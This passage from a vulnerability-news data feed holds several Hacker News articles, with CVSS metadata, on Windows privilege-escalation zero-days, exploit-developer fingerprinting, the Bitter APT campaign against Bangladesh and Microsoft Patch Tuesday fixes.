claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers \"at potential risk.\" \n \nThe vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday. \n \nSo, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers. \n \nAccording to Microsoft's [security bulletin](<https://technet.microsoft.com/library/security/MS16-135>) released today, any hacker who tricked victims into running a \"specially-crafted application\" could successfully exploit the system bug and gain the ability to \"install programs; view, change, or delete data; or create new accounts with full user rights.\" \n \nOnce exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine. \n \nRated as \"important,\" the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks. \n \n[Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) is the same group of hackers that has also been accused by the US Intelligence community of hacking the [Democratic National Committee](<https://thehackernews.com/2016/07/russia-dnc-email-hack.html>), Clinton Campaign Chair [John Podesta](<https://thehackernews.com/2016/10/wikileaks-clinton-leak.html>), and former Secretary of State Colin Powell, among others. \n \nBesides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs. \n \nPatch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge. \n \nSo, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today.\n", "cvss3": {}, "published": "2016-11-09T06:12:00", "type": "thn", "title": "Microsoft Patches Windows Zero-Day Flaw Disclosed by Google", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-09T17:12:11", "id": "THN:F8BDC767F3D202913920E1C28D137377", "href": "https://thehackernews.com/2016/11/microsoft-windows-update.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:07", "description": "[](<https://thehackernews.com/images/-VgCR2Fih8qA/X3bKP0yAofI/AAAAAAAA3Xk/2BjzswcnClsJubOJnK-h72WdkV--wVjvwCLcBGAsYHQ/s0/exploit-development.jpg>)\n\nWriting advanced malware for a threat actor requires different groups of people with diverse technical expertise to put them all together. But can the code leave enough clues to reveal the person behind it?\n\nTo this effect, cybersecurity researchers on Friday detailed a new methodology to identify exploit authors that use their unique characteristics as a fingerprint to track down other exploits developed by them.\n\nBy deploying this technique, the researchers were able to link 16 Windows local privilege escalation (LPE) exploits to two zero-day sellers \"Volodya\" (previously called \"BuggiCorp\") and \"PlayBit\" (or \"luxor2008\").\n\n\"Instead of focusing on an entire malware and hunting for new samples of the malware family or actor, we wanted to offer another perspective and decided to concentrate on these few functions that were written by an exploit developer,\" Check Point Research's [Itay Cohen and Eyal Itkin](<https://research.checkpoint.com/2020/graphology-of-an-exploit-volodya/>) noted.\n\n## Fingerprinting an Exploit Writer's Characteristics\n\nThe idea, in a nutshell, is to fingerprint an exploit for specific artifacts that can uniquely tie it to a developer. It could be in using hard-coded values, string names, or even how the code is organized and certain functions are implemented.\n\nCheck Point said their analysis began in response to a \"complicated attack\" against one of its customers when they encountered a 64-bit malware executable that exploited [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>) to gain elevated privileges.\n\nNoticing the fact that the exploit and the malware were written by two different sets of people, the researchers used the binary's properties as a unique hunting signature to find at least 11 other exploits developed by the same developer named \"Volodya\" (or \"Volodimir\").\n\n[](<https://thehackernews.com/images/-8XQpJ6aaOXE/X3bJepUcWVI/AAAAAAAA3Xc/RKyut5eDU-EfRXvFOJBCku7GCiTWNXJwgCLcBGAsYHQ/s0/malware-1.jpg>)\n\n\"Finding a vulnerability, and reliably exploiting it, will most probably be done by specific teams or individuals who specialize in a particular role. The malware developers for their part don't really care how it works behind the scenes, they just want to integrate this [exploits] module and be done with it,\" the researchers said.\n\nInterestingly, Volodya \u2014 likely of Ukrainian origin \u2014 has been [previously linked](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/>) to selling Windows zero-days to cyberespionage groups and crimeware gangs for anywhere between $85,000 to $200,000.\n\nChief among them was an LPE exploit that leveraged a memory corruption in \"[NtUserSetWindowLongPtr](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra>)\" (CVE-2016-7255), which has been widely used by ransomware operators like GandCrab, Cerber, and [Magniber](<https://securelist.com/magnitude-exploit-kit-evolution/97436/>). It's now believed that Volodya [advertised this LPE zero-day](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/zero-day-auction-for-the-masses/>) on the Exploit.in cybercrime forum in May 2016.\n\nIn all, five zero-day and six one-day exploits were identified as developed by Volodya over a period of 2015-2019. Subsequently, the same technique was employed to identify five more LPE exploits from another exploit writer known as PlayBit.\n\n## An Extensive Clientele\n\nStating the exploit samples shared code level similarities to grant SYSTEM privileges to the desired process, the researchers said, \"both of our actors were very consistent in their respective exploitation routines, each sticking to their favorite way.\"\n\nWhat's more, Volodya also appears to have switched up his tactics during the intervening years, with the developer shifting from selling the exploits as embeddable source code in the malware to an external utility that accepts a specific API.\n\nBesides ransomware groups, Volodya has been found to cater to an extensive clientele, including the Ursnif banking trojan, and APT groups such as Turla, APT28, and Buhtrap.\n\n[](<https://thehackernews.com/images/-MNtIN_O8MUA/X3bJJ7ypHuI/AAAAAAAA3XU/cceh7GbuWRUA-YVEd84SYiMoxzAoPtLbwCLcBGAsYHQ/s0/malware.jpg>)\n\n\"The APT customers, Turla, APT28, and Buhtrap, are all commonly attributed to Russia and it is interesting to find that even these advanced groups purchase exploits instead of developing them in-house,\" Check Point observed in its analysis. \"This is another point which further strengthens our hypothesis that the written exploits can be treated as a separate and distinct part of the malware.\"\n\nWith cyberattacks expanding in scope, frequency, and magnitude, using an exploit developer's code signature as a means to track down bad actors could provide valuable insight into the black exploit market.\n\n\"When Check Point finds a vulnerability, we demonstrate its severity, report it to the appropriate vendor, and make sure it's patched, so it doesn't pose a threat,\" Cohen said. \"However, for individuals trading these exploits, it's a completely different story. For them, finding the vulnerability is just the beginning. They need to reliably exploit it on as many versions as possible, in order to monetize it to a customer's satisfaction.\"\n\n\"This research provides insight into how that is achieved, and the buyers in this market, which often include nation-state actors. We believe that this research methodology can be used to identify additional exploit writers.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-02T09:59:00", "type": "thn", "title": "Researchers Fingerprint Exploit Developers Who Help Several Malware Authors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-0859"], "modified": "2020-10-02T10:18:28", "id": "THN:89E2A7A39CBD630AB15218875ED90D19", "href": "https://thehackernews.com/2020/10/exploit-development.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf>)\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, concerns a case of elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-07T05:03:44", "id": "THN:012EBB2FE2687F178FBCC3AB8ABEF778", "href": "https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:21", "description": "[](<https://thehackernews.com/images/-YROWoUQuY8Q/YHZ1yLhkJGI/AAAAAAAACQw/rmFTIz73mk81DI0P2vG2MpkxtMrT5jqbgCLcBGAsYHQ/s0/windows-update-smb-flaw.jpg>)\n\nIn its April slate of patches, Microsoft rolled out fixes for a total of [114 security flaws](<https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/>), including an actively exploited zero-day and four remote code execution bugs in Exchange Server.\n\nOf the [114 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>), 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity.\n\nChief among them is [CVE-2021-28310](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310>), a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system. \n\nCybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw ([CVE-2021-1732](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>)) in attacks late last year.\n\n\"It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access,\" Kaspersky researcher Boris Larin [said](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\n## NSA Found New Bugs Affecting Exchange Server\n\nAlso fixed by Microsoft are four remote code execution (RCE) flaws (CVE-2021-28480 through CVE-2021-28483) affecting [on-premises Exchange Servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2021-exchange-server-security-updates/ba-p/2254617>) 2013, 2016, and 2019 that were reported to the company by the U.S. National Security Agency (NSA). Two of the code execution bugs are unauthenticated and require no user interaction, and carry a CVSS score of 9.8 out of a maximum of 10.\n\n[](<https://thehackernews.com/images/-8FoY65fokvw/YHZ2L3VP2bI/AAAAAAAACQ4/krAsXabe1VgmdxN0j2h4MtXElmsH8ApJACLcBGAsYHQ/s0/microsoft-exchnage.jpg>)\n\nWhile the Windows maker said it had found no evidence of any active exploits in the wild, it's recommended that customers install these updates as soon as possible to secure the environment, particularly in light of the widespread Exchange Server hacks last month and new findings that attackers are attempting to leverage the [ProxyLogon](<https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html>) exploit to [deploy malicious cryptominers](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) onto Exchange Servers, with the payload being hosted on a compromised Exchange Server.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also [revised](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/13/apply-microsoft-april-2021-security-update-mitigate-newly>) the emergency directive it issued last month, stating \"these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action,\" while cautioning that the underlying flaws can be weaponized by reverse-engineering the patch to create an exploit.\n\nCybersecurity firm Check Point, which has been tracking ongoing cyber threats exploiting the Exchange Server flaws, said a total of 110,407 attacks have been prevented targeting government, manufacturing, finance, healthcare, legal, and insurance industries in the U.S., U.K., Germany, Netherlands, and Brazil.\n\n## FBI Removed Backdoors From Hacked MS Exchange servers\n\nWhat's more, the U.S. Federal Bureau of Investigation (FBI) carried out a \"successful action\" to \"copy and remove\" web shells planted by adversaries on hundreds of victim computers using the ProxyLogon flaws. The FBI is said to have wiped the web shells that were installed by Hafnium that could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.\n\n\"The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),\" the Justice Department [said](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>) in a statement detailing the court-authorized operation.\n\n## 27 RCE Flaws in Windows RPC and Other Fixes\n\nMicrosoft also said four additional vulnerabilities were publicly known at the time of release but not exploited \u2014\n\n * CVE-2021-28458 - Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability\n * CVE-2021-27091 - RPC Endpoint Mapper Service Elevation of Privilege Vulnerability\n * CVE-2021-28437 - Windows Installer Information Disclosure Vulnerability\n * CVE-2021-28312 - Windows NTFS Denial of Service Vulnerability\n\nIn addition, April's Patch Tuesday update also addresses a whopping 27 RCE flaws in Remote Procedure Call (RPC) runtime, a Hyper-V security feature bypass vulnerability (CVE-2021-28444), and multiple privilege escalation flaws in Windows Speech Runtime, Windows Services and Controller App, Windows Secure Kernel Mode, Windows Event Tracing, and Windows Installer.\n\n## Software Patches From Other Vendors\n\nBesides Microsoft, a number of other vendors have also released a slew of patches on Tuesday \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>) (security updates for Photoshop, Digital Editions, RoboHelp, and Bridge)\n * [DELL](<https://www.dell.com/support/security/en-in>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-April/date.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-14T04:58:00", "type": "thn", "title": "NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27091", "CVE-2021-28310", "CVE-2021-28312", "CVE-2021-28437", "CVE-2021-28444", "CVE-2021-28458", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-15T05:57:31", "id": "THN:F163C7AB35BEF8E28924E14B02752181", "href": "https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:08", "description": "[](<https://thehackernews.com/images/-pOCXw5Vbz4E/YCNjQpEwYHI/AAAAAAAABuA/DON2kef7nngGbrXuKE_q5XlYxFXBjgnbQCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday [issued fixes for 56 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb>), including a critical vulnerability that's known to be actively exploited in the wild.\n\nIn all, 11 are listed as Critical, 43 are listed as Important, and two are listed as Moderate in severity \u2014 six of which are previously disclosed vulnerabilities.\n\nThe updates cover .NET Framework, Azure IoT, Microsoft Dynamics, Microsoft Edge for Android, Microsoft Exchange Server, Microsoft Office, Microsoft Windows Codecs Library, Skype for Business, Visual Studio, Windows Defender, and other core components such as Kernel, TCP/IP, Print Spooler, and Remote Procedure Call (RPC).\n\n### A Windows Win32k Privilege Escalation Vulnerability\n\nThe most critical of the flaws is a Windows Win32k privilege escalation vulnerability (CVE-2021-1732, CVSS score 7.8) that allows attackers with access to a target system to run malicious code with elevated permissions. Microsoft credited JinQuan, MaDongZe, TuXiaoYi, and LiHao of DBAPPSecurity for discovering and reporting the vulnerability.\n\nIn a separate technical write-up, the researchers said a zero-day exploit leveraging the flaw was detected in a \"very limited number of attacks\" against victims located in China by a threat actor named Bitter APT. The attacks were discovered in December 2020.\n\n\"This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft [Internet Explorer] browser or Adobe Reader on the latest Windows 10 version,\" DBAPPSecurity researchers [said](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>). \"The vulnerability is high quality and the exploit is sophisticated.\"\n\nIt's worth noting that Adobe, as part of its February patch, [addressed](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) a critical buffer overflow flaw in Adobe Acrobat and Reader for Windows and macOS (CVE-2021-21017) that it said could lead to arbitrary code execution in the context of the current user.\n\nThe company also warned of active exploitation attempts against the bug in the wild in limited attacks targeting Adobe Reader users on Windows, mirroring aforementioned findings from DBAPPSecurity.\n\nWhile neither Microsoft nor Adobe has provided additional details, the concurrent patching of the two flaws raises the possibility that the vulnerabilities are being chained to carry out the in-the-wild attacks.\n\n### Netlogon Enforcement Mode Goes Into Effect\n\nMicrosoft's Patch Tuesday update also resolves a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-24078), .NET Core, and Visual Studio (CVE-2021-26701), Microsoft Windows Codecs Library (CVE-2021-24081), and Fax Service (CVE-2021-1722 and CVE-2021-24077).\n\nThe RCE in Windows DNS server component is rated 9.8 for severity, making it a critical vulnerability that, if left unpatched, could permit an unauthorized adversary to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nMicrosoft is also taking this month to push second round of fixes for the [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) flaw (CVE-2020-1472) that was originally resolved in August 2020, following which [reports of active exploitation](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) targeting unpatched systems emerged in September 2020.\n\nStarting February 9, the domain controller \"[enforcement mode](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)\" will be [enabled by default](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>), thus blocking \"vulnerable [Netlogon] connections from non-compliant devices.\"\n\nIn addition, the Patch Tuesday update rectifies two information disclosure bugs \u2014 one in Edge browser for Android (CVE-2021-24100) that could have revealed personally identifiable information and payment information of a user, and the other in Microsoft Teams for iOS (CVE-2021-24114) that could have exposed the Skype token value in the preview URL for images in the app.\n\n### RCE Flaws in Windows TCP/IP Stack\n\nLastly, the Windows maker released a set of fixes affecting its TCP/IP implementation \u2014 consisting of two RCE flaws (CVE-2021-24074 and CVE-2021-24094) and one denial of service vulnerability (CVE-2021-24086) \u2014 that it said could be exploited with a DoS attack.\n\n\"The DoS exploits for these CVEs would allow a remote attacker to cause a stop error,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) in an advisory. \"Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic. Thus, we recommend customers move quickly to apply Windows security updates this month.\"\n\nThe tech giant, however, noted that the complexity of the two TCP/IP RCE flaws would make it hard to develop functional exploits. But it expects attackers to create DoS exploits much more 